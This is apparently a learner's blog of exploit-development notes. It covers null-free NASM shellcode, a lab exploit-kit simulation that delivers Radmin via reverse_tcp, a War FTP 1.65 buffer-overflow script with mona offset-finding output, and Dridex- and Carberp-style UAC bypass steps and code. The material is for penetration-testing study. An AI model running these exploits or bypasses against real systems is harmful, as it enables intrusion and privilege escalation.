Let’s Learn: Preparing Shellcode in NASM

Goal: Create a neat shellcode without padded “00” in NASM for exploit bundling
Source: OpenSecurityTraining “Software Exploits”
Attempt I:

; ;;;;;;;;;;;;;;;;;;;;;;;; 
basic ‘Hello World’ in nasm
; compile with nasm -f elf hello.asm; ld -o hello hello.o
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(int fd, char *msg, unsigned int len)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(int ret)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 1
mov ebx, 0
int 0x80

Attempt II (change extended to lower byte register values):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 4
mov bl, 1
mov ecx, msg
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Attempt III (achieve code independence):
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!! = 4f,77,6e,65,64,21,21,0xa
; push \n,!,!,d
push 0x0a212164
; push e,n,w,O
push 0x656e774f
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Attempt IV (remove 0xa newline):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!! = 4f,77,6e,65,64,21,21,0xa
; push \n,!,!,d
push 0x21212164
; push e,n,w,O
push 0x656e774f
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Exploit Kit Experience Demonstration

Learning Outcome:

  • Simulate an exploit kit (EK) attack by hosting a plethora of relevant browser exploits (with the malicious iframe injection) on the fake “Java Required” page with the endgoal of downloading and running Radmin, a remote administration tool with the reverse_tcp shellcode backconnect, on the victim host.

Setup:

  • Setup a local HTTP server with the exploitable vulnerabilities available through MetaSploit Framework
Picture

Outcome:

  • I. Windows 7 Chrominum Browser -> served with 6 exploits
  • II. Windows 7 Firefox/5.0 46.0 Browser > served with 10 exploits​
Picture

Here is an interesting traffic call:
-> 192.168.0.192:8080
GET /?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6RmlyZWZveDozNS4wOg== HTTP/1.1
Host: 192.168.0.192:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.192:8080/
Connection: keep-alive

[sessid=base64encoded(Windows 7:undefined:undefined:undefined:undefined:en-US:x86:Firefox:35.0:)[

All in all, we are served with the two PHP files:

1 – Exploit rotator;  and
2 – Exploit enumerator

Picture

Here is the rotator script captured by Fiddler Web Developer on the data request:
global_exploit_list[global_exploit_list.length] = {
‘test’:’if (!ua_ver_lt(detected_version[\’ua_version\’], \’15.0\’) && !ua_ver_gt(detected_version[\’ua_version\’], \’22.0\’)) { is_vuln = true;} else { is_vuln = false; }’,
‘resource’:’/UmOgoQAuaH’};
global_exploit_list[global_exploit_list.length] = {
‘test’:’if (!ua_ver_lt(detected_version[\’ua_version\’], \’22.0\’) && !ua_ver_gt(detected_version[\’ua_version\’], \’27.0\’)) { is_vuln = true;} else { is_vuln = false; }’,  ‘resource’:’/AcOkePbJp’};

global_exploit_list[global_exploit_list.length] = {
‘test’:’is_vuln = navigator.javaEnabled()’,
  ‘resource’:’/LcfQAkA’};

global_exploit_list[global_exploit_list.length] = {
 ‘test’:’is_vuln = navigator.javaEnabled()’,
‘resource’:’/usBkaxsZ’};
global_exploit_list[global_exploit_list.length] = {
‘test’:’is_vuln = navigator.javaEnabled()’,
‘resource’:’/qMVrLY’};
global_exploit_list[global_exploit_list.length] = {
 ‘test’:’is_vuln = navigator.javaEnabled()’,
 ‘resource’:’/XhgZgfkin’};
global_exploit_list[global_exploit_list.length] = {
‘test’:’is_vuln = navigator.javaEnabled()’,
‘resource’:’/pUHbtcUl’};
global_exploit_list[global_exploit_list.length] = {
‘test’:’is_vuln = navigator.javaEnabled()’,
‘resource’:’/KCHgwKCyyIb’};
global_exploit_list[global_exploit_list.length] = {
‘test’:’if (!ua_ver_lt(detected_version[\’ua_version\’], \’5.0\’) && !ua_ver_gt(detected_version[\’ua_version\’], \’15.0.1\’)) { is_vuln = true;} else { is_vuln = false; }’,
‘resource’:’/FBapzEXZJVcM’};

global_exploit_list[global_exploit_list.length] = {
‘test’:’if (!ua_ver_lt(detected_version[\’ua_version\’], \’3.5\’) && !ua_ver_gt(detected_version[\’ua_version\’], \’3.6.16\’)) { if (navigator.userAgent.indexOf(\’Windows NT 5.1\’) != -1 || navigator.javaEnabled()) { is_vuln = true; }} else { is_vuln = false; }’,’resource’:’/YLDbvbb’};

window.next_exploit(0);

Finding Exploit-Friendly Instructions

Source: Python “Grey Hat”

After you have obtained EIP control, you have to transfer execution to your shellcode. Typically, you will have a register or an offset from a register that points to your shellcode, and it’s your job to find an instruction somewhere in the executable or one of its loaded modules that will transfer control to that address.
========

from immlib import *
def main(args):
 imm = Debugger()
 search_code = “”.join(args)
 search_bytes = imm.Assemble( search_code)
 search_results= imm.Search( search_bytes ) 


 for hit in search_results: 

 # Retrieve the memory page where this hit exists
 
# and make sure it’s executable

code_page = imm.getMemoryPagebyAddress( hit )
 access = code_page.getAccess( human = True ) 

 if “execute” in access.lower():
   imm.log( “[*] Found: %s (0x%08x)” % ( search_code, hit ),
    address = hit )
return “[*] Finished searching for instructions, check the Log window.” 

​========

Writing Exploits with Mona

Sourcehttp://blog.pusheax.com/2013/03/exploit-writing-stack-based-buffer.html

0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p
3. !mona pattern_create 2000
!mona pattern_offset 37694136  (EIP value — during the crash)
5. Modify the script

print “Creating exploit.”
f=open(“crash-me.PLF”,”w”)
#Create the file
push=”A”*260 #Found by mona.py
eip =”BBBB” #more 4 bytes to overwrite EIP
junk=”C”*1736 #Later will replace this with real shellcode
try:
  f.write(push+eip+junk)
  f.close()
print “File created”
except:
  print “File cannot be created”

Our Next goal will be:
1. Replacing “BBBB” with valid pointer (Pointer to esp and esp will hold shellcode)
2. Solving an(CCCC… after EIP) easy problem.
3. Replacing “CCCCCC…” with real shellcode.

6. !mona jmp -r esp -o 

War FTP 1.65 Buffer Overflow Part 1

Source: Cybrary: Advanced Penetration Testing

  • Give the program too much input in the username (USER) field
  • Saved return pointer will be overwritten with our attack controlled input

Immunity Debugger

  • Go to File ->Attach -> war-ftpd

Setup Logging:

  • !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite

  • !mona pattern_create 1100

===============================================================
  Output generated by mona.py v2.0, rev 566 – Immunity Debugger
===============================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
===============================================================
===============================================================

Pattern of 1100 bytes :
———————–

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk

HEX:
\x41\x61\x30\x41\x61\x31\x41\x61\x32\x41\x61\x33\x41\x61\x34\x41\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35\x41\x62\x36\x41\x62\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41\x63\x31\x41\x63\x32\x41\x63\x33\x41\x63\x34\x41\x63\x35\x41\x63\x36\x41\x63\x37\x41\x63\x38\x41\x63\x39\x41\x64\x30\x41\x64\x31\x41\x64\x32\x41\x64\x33\x41\x64\x34\x41\x64\x35\x41\x64\x36\x41\x64\x37\x41\x64\x38\x41\x64\x39\x41\x65\x30\x41\x65\x31\x41\x65\x32\x41\x65\x33\x41\x65\x34\x41\x65\x35\x41\x65\x36\x41\x65\x37\x41\x65\x38\x41\x65\x39\x41\x66\x30\x41\x66\x31\x41\x66\x32\x41\x66\x33\x41\x66\x34\x41\x66\x35\x41\x66\x36\x41\x66\x37\x41\x66\x38\x41\x66\x39\x41\x67\x30\x41\x67\x31\x41\x67\x32\x41\x67\x33\x41\x67\x34\x41\x67\x35\x41\x67\x36\x41\x67\x37\x41\x67\x38\x41\x67\x39\x41\x68\x30\x41\x68\x31\x41\x68\x32\x41\x68\x33\x41\x68\x34\x41\x68\x35\x41\x68\x36\x41\x68\x37\x41\x68\x38\x41\x68\x39\x41\x69\x30\x41\x69\x31\x41\x69\x32\x41\x69\x33\x41\x69\x34\x41\x69\x35\x41\x69\x36\x41\x69\x37\x41\x69\x38\x41\x69\x39\x41\x6a\x30\x41\x6a\x31\x41\x6a\x32\x41\x6a\x33\x41\x6a\x34\x41\x6a\x35\x41\x6a\x36\x41\x6a\x37\x41\x6a\x38\x41\x6a\x39\x41\x6b\x30\x41\x6b\x31\x41\x6b\x32\x41\x6b\x33\x41\x6b\x34\x41\x6b\x35\x41\x6b\x36\x41\x6b\x37\x41\x6b\x38\x41\x6b\x39\x41\x6c\x30\x41\x6c\x31\x41\x6c\x32\x41\x6c\x33\x41\x6c\x34\x41\x6c\x35\x41\x6c\x36\x41\x6c\x37\x41\x6c\x38\x41\x6c\x39\x41\x6d\x30\x41\x6d\x31\x41\x6d\x32\x41\x6d\x33\x41\x6d\x34\x41\x6d\x35\x41\x6d\x36\x41\x6d\x37\x41\x6d\x38\x41\x6d\x39\x41\x6e\x30\x41\x6e\x31\x41\x6e\x32\x41\x6e\x33\x41\x6e\x34\x41\x6e\x35\x41\x6e\x36\x41\x6e\x37\x41\x6e\x38\x41\x6e\x39\x41\x6f\x30\x41\x6f\x31\x41\x6f\x32\x41\x6f\x33\x41\x6f\x34\x41\x6f\x35\x41\x6f\x36\x41\x6f\x37\x41\x6f\x38\x41\x6f\x39\x41\x70\x30\x41\x70\x31\x41\x70\x32\x41\x70\x33\x41\x70\x34\x41\x70\x35\x41\x70\x36\x41\x70\x37\x41\x70\x38\x41\x70\x39\x41\x71\x30\x41\x71\x31\x41\x71\x32\x41\x71\x33\x41\x71\x34\x41\x71\x35\x41\x71\x36\x41\x71\x37\x41\x71\x38\x41\x71\x39\x41\x72\x30\x41\x72\x31\x41\x72\x32\x41\x72\x33\x41\x72\x34\x41\x72\x35\x41\x72\x36\x41\x72\x37\x41\x72\x38\x41\x72\x39\x41\x73\x30\x41\x73\x31\x41\x73\x32\x41\x73\x33\x41\x73\x34\x41\x73\x35\x41\x73\x36\x41\x73\x37\x41\x73\x38\x41\x73\x39\x41\x74\x30\x41\x74\x31\x41\x74\x32\x41\x74\x33\x41\x74\x34\x41\x74\x35\x41\x74\x36\x41\x74\x37\x41\x74\x38\x41\x74\x39\x41\x75\x30\x41\x75\x31\x41\x75\x32\x41\x75\x33\x41\x75\x34\x41\x75\x35\x41\x75\x36\x41\x75\x37\x41\x75\x38\x41\x75\x39\x41\x76\x30\x41\x76\x31\x41\x76\x32\x41\x76\x33\x41\x76\x34\x41\x76\x35\x41\x76\x36\x41\x76\x37\x41\x76\x38\x41\x76\x39\x41\x77\x30\x41\x77\x31\x41\x77\x32\x41\x77\x33\x41\x77\x34\x41\x77\x35\x41\x77\x36\x41\x77\x37\x41\x77\x38\x41\x77\x39\x41\x78\x30\x41\x78\x31\x41\x78\x32\x41\x78\x33\x41\x78\x34\x41\x78\x35\x41\x78\x36\x41\x78\x37\x41\x78\x38\x41\x78\x39\x41\x79\x30\x41\x79\x31\x41\x79\x32\x41\x79\x33\x41\x79\x34\x41\x79\x35\x41\x79\x36\x41\x79\x37\x41\x79\x38\x41\x79\x39\x41\x7a\x30\x41\x7a\x31\x41\x7a\x32\x41\x7a\x33\x41\x7a\x34\x41\x7a\x35\x41\x7a\x36\x41\x7a\x37\x41\x7a\x38\x41\x7a\x39\x42\x61\x30\x42\x61\x31\x42\x61\x32\x42\x61\x33\x42\x61\x34\x42\x61\x35\x42\x61\x36\x42\x61\x37\x42\x61\x38\x42\x61\x39\x42\x62\x30\x42\x62\x31\x42\x62\x32\x42\x62\x33\x42\x62\x34\x42\x62\x35\x42\x62\x36\x42\x62\x37\x42\x62\x38\x42\x62\x39\x42\x63\x30\x42\x63\x31\x42\x63\x32\x42\x63\x33\x42\x63\x34\x42\x63\x35\x42\x63\x36\x42\x63\x37\x42\x63\x38\x42\x63\x39\x42\x64\x30\x42\x64\x31\x42\x64\x32\x42\x64\x33\x42\x64\x34\x42\x64\x35\x42\x64\x36\x42\x64\x37\x42\x64\x38\x42\x64\x39\x42\x65\x30\x42\x65\x31\x42\x65\x32\x42\x65\x33\x42\x65\x34\x42\x65\x35\x42\x65\x36\x42\x65\x37\x42\x65\x38\x42\x65\x39\x42\x66\x30\x42\x66\x31\x42\x66\x32\x42\x66\x33\x42\x66\x34\x42\x66\x35\x42\x66\x36\x42\x66\x37\x42\x66\x38\x42\x66\x39\x42\x67\x30\x42\x67\x31\x42\x67\x32\x42\x67\x33\x42\x67\x34\x42\x67\x35\x42\x67\x36\x42\x67\x37\x42\x67\x38\x42\x67\x39\x42\x68\x30\x42\x68\x31\x42\x68\x32\x42\x68\x33\x42\x68\x34\x42\x68\x35\x42\x68\x36\x42\x68\x37\x42\x68\x38\x42\x68\x39\x42\x69\x30\x42\x69\x31\x42\x69\x32\x42\x69\x33\x42\x69\x34\x42\x69\x35\x42\x69\x36\x42\x69\x37\x42\x69\x38\x42\x69\x39\x42\x6a\x30\x42\x6a\x31\x42\x6a\x32\x42\x6a\x33\x42\x6a\x34\x42\x6a\x35\x42\x6a\x36\x42\x6a\x37\x42\x6a\x38\x42\x6a\x39\x42\x6b\x30\x42\x6b\x31\x42\x6b\x32\x42\x6b\x33\x42\x6b\x34\x42\x6b\x35\x42\x6b

JAVASCRIPT (unescape() friendly):
%u6141%u4130%u3161%u6141%u4132%u3361%u6141%u4134%u3561%u6141%u4136%u3761%u6141%u4138%u3961%u6241%u4130%u3162%u6241%u4132%u3362%u6241%u4134%u3562%u6241%u4136%u3762%u6241%u4138%u3962%u6341%u4130%u3163%u6341%u4132%u3363%u6341%u4134%u3563%u6341%u4136%u3763%u6341%u4138%u3963%u6441%u4130%u3164%u6441%u4132%u3364%u6441%u4134%u3564%u6441%u4136%u3764%u6441%u4138%u3964%u6541%u4130%u3165%u6541%u4132%u3365%u6541%u4134%u3565%u6541%u4136%u3765%u6541%u4138%u3965%u6641%u4130%u3166%u6641%u4132%u3366%u6641%u4134%u3566%u6641%u4136%u3766%u6641%u4138%u3966%u6741%u4130%u3167%u6741%u4132%u3367%u6741%u4134%u3567%u6741%u4136%u3767%u6741%u4138%u3967%u6841%u4130%u3168%u6841%u4132%u3368%u6841%u4134%u3568%u6841%u4136%u3768%u6841%u4138%u3968%u6941%u4130%u3169%u6941%u4132%u3369%u6941%u4134%u3569%u6941%u4136%u3769%u6941%u4138%u3969%u6a41%u4130%u316a%u6a41%u4132%u336a%u6a41%u4134%u356a%u6a41%u4136%u376a%u6a41%u4138%u396a%u6b41%u4130%u316b%u6b41%u4132%u336b%u6b41%u4134%u356b%u6b41%u4136%u376b%u6b41%u4138%u396b%u6c41%u4130%u316c%u6c41%u4132%u336c%u6c41%u4134%u356c%u6c41%u4136%u376c%u6c41%u4138%u396c%u6d41%u4130%u316d%u6d41%u4132%u336d%u6d41%u4134%u356d%u6d41%u4136%u376d%u6d41%u4138%u396d%u6e41%u4130%u316e%u6e41%u4132%u336e%u6e41%u4134%u356e%u6e41%u4136%u376e%u6e41%u4138%u396e%u6f41%u4130%u316f%u6f41%u4132%u336f%u6f41%u4134%u356f%u6f41%u4136%u376f%u6f41%u4138%u396f%u7041%u4130%u3170%u7041%u4132%u3370%u7041%u4134%u3570%u7041%u4136%u3770%u7041%u4138%u3970%u7141%u4130%u3171%u7141%u4132%u3371%u7141%u4134%u3571%u7141%u4136%u3771%u7141%u4138%u3971%u7241%u4130%u3172%u7241%u4132%u3372%u7241%u4134%u3572%u7241%u4136%u3772%u7241%u4138%u3972%u7341%u4130%u3173%u7341%u4132%u3373%u7341%u4134%u3573%u7341%u4136%u3773%u7341%u4138%u3973%u7441%u4130%u3174%u7441%u4132%u3374%u7441%u4134%u3574%u7441%u4136%u3774%u7441%u4138%u3974%u7541%u4130%u3175%u7541%u4132%u3375%u7541%u4134%u3575%u7541%u4136%u3775%u7541%u4138%u3975%u7641%u4130%u3176%u7641%u4132%u3376%u7641%u4134%u3576%u7641%u4136%u3776%u7641%u4138%u3976%u7741%u4130%u3177%u7741%u4132%u3377%u7741%u4134%u3577%u7741%u4136%u3777%u7741%u4138%u3977%u7841%u4130%u3178%u7841%u4132%u3378%u7841%u4134%u3578%u7841%u4136%u3778%u7841%u4138%u3978%u7941%u4130%u3179%u7941%u4132%u3379%u7941%u4134%u3579%u7941%u4136%u3779%u7941%u4138%u3979%u7a41%u4130%u317a%u7a41%u4132%u337a%u7a41%u4134%u357a%u7a41%u4136%u377a%u7a41%u4138%u397a%u6142%u4230%u3161%u6142%u4232%u3361%u6142%u4234%u3561%u6142%u4236%u3761%u6142%u4238%u3961%u6242%u4230%u3162%u6242%u4232%u3362%u6242%u4234%u3562%u6242%u4236%u3762%u6242%u4238%u3962%u6342%u4230%u3163%u6342%u4232%u3363%u6342%u4234%u3563%u6342%u4236%u3763%u6342%u4238%u3963%u6442%u4230%u3164%u6442%u4232%u3364%u6442%u4234%u3564%u6442%u4236%u3764%u6442%u4238%u3964%u6542%u4230%u3165%u6542%u4232%u3365%u6542%u4234%u3565%u6542%u4236%u3765%u6542%u4238%u3965%u6642%u4230%u3166%u6642%u4232%u3366%u6642%u4234%u3566%u6642%u4236%u3766%u6642%u4238%u3966%u6742%u4230%u3167%u6742%u4232%u3367%u6742%u4234%u3567%u6742%u4236%u3767%u6742%u4238%u3967%u6842%u4230%u3168%u6842%u4232%u3368%u6842%u4234%u3568%u6842%u4236%u3768%u6842%u4238%u3968%u6942%u4230%u3169%u6942%u4232%u3369%u6942%u4234%u3569%u6942%u4236%u3769%u6942%u4238%u3969%u6a42%u4230%u316a%u6a42%u4232%u336a%u6a42%u4234%u356a%u6a42%u4236%u376a%u6a42%u4238%u396a%u6b42%u4230%u316b%u6b42%u4232%u336b%u6b42%u4234%u356b%u6b42

Exploit:
#!/usr/bin/python
import socket
#buffer = “A” * 1100
buffer = “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2 Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A g7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak 3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5A n6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq 8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3A u4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax 6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0B b1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4B e5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi 0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk” s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘10.0.0.58’,21))
response = s.recv(1024)
print response s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response
s.send(‘PASS PASSWORD\r\n’)
s.close()

After the exploit hits War FTP -> !mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory.

Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern.

  • EIP contains normal pattern : 0x32714131 (offset 485)
  • ESP (0x00affd48) points at offset 493 in normal pattern (length 607)
  • EDI (0x00affe48) points at offset 749 in normal pattern (length 351)
  • EBP (0x00affda0) points at offset 581 in normal pattern (length 519)

Verifying Offsets
#!/usr/bin/python
import socket
buffer = “A” * 485 + “B” * 4 + “C” * 611
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘192.168.20.10’,21))
response = s.recv(1024)
print response s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response s.send(‘PASS PASSWORD\r\n’)
s.close()

UAC Bypass Method: Application Compatibility a/k/a Dridex Method

This UAC bypass method encompasses manipulating application compatibility databases.

Method of Operation:

  1. Dridex creates an application compatibility database ($$$.sdb), a batch file ($$$.bat) and a copy of itself (edg3FAC.exe)
  2. Dridex uses the sdbinst command to install/uninstall application compatibility databases to install $$$.sdb.
  3. Dridex launches the iscsicli command, which is a command line tool for iSCSI initiator. However, the configuration in the installed application compatibility database ($$$.sdb) causes iscsicli.exe to execute $$$.bat with administrative privileges.
  4. $$$.bat executes edg3FAC.exe with administrative privileges.
  • Auto-elevation programs such as sdbinst.exe and iscsicli.exe automatically elevate privileges to administrative privileges when launched without a UAC warning being displayed.
  • The sdbinst command, which can change the behavior of other programs, is an auto-elevation program.
Picture

1. ucmInitAppHelp
* Purpose:
*Initialize AppHelp routines.

2. ucmRegisterAndRunTarget
* Purpose:
* Register shim database and execute target app.

3. ucmShimRedirectEXE
* Purpose:
* Build, register shim database and execute target app.
* Initially used in BlackEnergy2 and Gootkit by mzH (alive-green).
* Currently used in number of trojans (Win32/Dyre, WinNT/Cridex)

tidShim = SdbBeginWriteListTag(hShimDb, TAG_SHIM_REF);
if (tidShim != TAGID_NULL) {
SdbWriteStringTag(hShimDb, TAG_NAME, L“RedirectEXE”);
SdbWriteStringTag(hShimDb, TAG_COMMAND_LINE, lpszPayloadEXE);
SdbEndWriteListTag(hShimDb, tidShim);
}
SdbEndWriteListTag(hShimDb, tidEXE);

4. ucmAppcompatElevation
* Purpose:
* AutoElevation using Application Compatibility engine.

Picture

Picture


UAC Bypass: The Carberp Style

  • Wusa method used by Win32/Carberp


static
 const char* uacTargetDir[] = { “system32\\sysprep”“ehome” };
static const char* uacTargetApp[] = { “sysprep.exe”“mcx2prov.exe” };
static const char* uacTargetDll[] = { “cryptbase.dll”“CRYPTSP.dll” };
static const char* uacTargetMsu[] = { “cryptbase.msu”“CRYPTSP.msu” };

Steps to reproduce:
1. Make .cab archive with your own cryptbase.dll or wdscore.dll and rename it to .MSU
2. Deploy .MSU to any system directory you want with wusa.exe. For example: wusa.exe PACKAGE.MSU /quiet /extract:%WINDIR%\system32\migwiz
3. Run migwiz.exe

Picture

1. ucmWusaExtractPackage
* Purpose:
* Extract cab to protected directory using wusa.

2. ucmWusaMethod
* Purpose:
* Build and install fake msu package then run target application.

3. ucmCreateCabinetForSingleFile
* Purpose:
* Build cabinet for usage in methods where required 1 file